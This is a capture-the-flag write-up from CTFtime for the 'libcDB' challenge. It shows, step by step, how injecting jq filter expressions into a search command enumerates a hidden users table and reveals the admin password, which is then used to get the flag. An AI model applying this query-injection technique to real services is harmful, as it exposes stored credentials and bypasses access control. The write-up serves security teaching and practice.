CTFtime.org

libcDB

by ehhthing / Daemon Summoners

Tags: databases 

Rating:

When we netcat in, we get prompted for login and password. After entering the account given to us, we are prompted for a command
```
Authenticated {"users":{"username":"Dead","password":"pool"}}

__ _ _ ____ _____
| | |_| |_ ___| \| __ |
| |__| | . | _| | | __ -|
|_____|_|___|___|____/|_____|
as a service

Type .help for help
```

If we run `.help`, we are given a few commands
```
> .help
.help Print this help
.version Print versions
.search Search libcdb
.secret Print flag
```

Running `.secret` complains that we are not admin
```
> .secret
not admin
no flag for u
```

Running `.search` without any parameters gives us the syntax and an example query:
```
> .search
.search <*symbol> <*addr> <filter>
Ex: .search fprintf 0x4b970

* required field
```

If we run the example query we get
```
Found:
id 6acfaae0398dce58e1857599a274f6d8
name ubuntu_libc6-dbg_2.4-1ubuntu12.3_amd64
symbol fprintf
address 0x4b970
Found:
id fc1e12693e5762252bc44256d5a72506
name ubuntu_libc6-dbg_2.4-1ubuntu12_amd64
symbol fprintf
address 0x4b970
```

If we play around a bit and try to add some random `filter` arguments to the given example, we end up getting a syntax error:
```
> .search fprintf 0x4b980 *
jq: error: syntax error, unexpected $end (Unix shell quoting issues?) at <top-level>, line 1:
. as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) | .*
jq: 1 compile error
```

We now know that the search command searches a json database with `jq`.

Now, we can enumerate some of the keys of `$maindb` to look for what else may be in the json file. To do this, we can set a `filter` argument like `|$maindb|.+{id:keys[0]}`.

The final jq query executed would look like `. as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) |.|$maindb|.+{id:keys[0]}`.

After testing `keys[1]`, we see that `$maindb` has a `users` key:
```
> .search fprintf 0x4b970 |$maindb|.+{id:keys[1]}
Found:
id users
Found:
id users
```

We can use the same exploit to enumerate the keys in `$maindb['user'][0]`:
```
> .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[0]}
Found:
id password
Found:
id password
> .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[1]}
Found:
id username
Found:
id username
```

From here, we can just enumerate all of the usernames:
```
> .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:.["username"]}
Found:
id 3k
Found:
id 3k
> .search fprintf 0x4b970 |$maindb|.["users"][1]|.+{id:.["username"]}
Found:
id James
Found:
id James
> .search fprintf 0x4b970 |$maindb|.["users"][2]|.+{id:.["username"]}
Found:
id Lars
Found:
id Lars
> .search fprintf 0x4b970 |$maindb|.["users"][3]|.+{id:.["username"]}
Found:
id Dead
Found:
id Dead
> .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["username"]}
Found:
id admin
Found:
id admin
```

Then, the `admin` password:
```
> .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["password"]}
Found:
id v3ryL0ngPwC4nTgu3SS0xfff
Found:
id v3ryL0ngPwC4nTgu3SS0xfff
```

We can then login with the admin credentials and run `.secret`.

Comments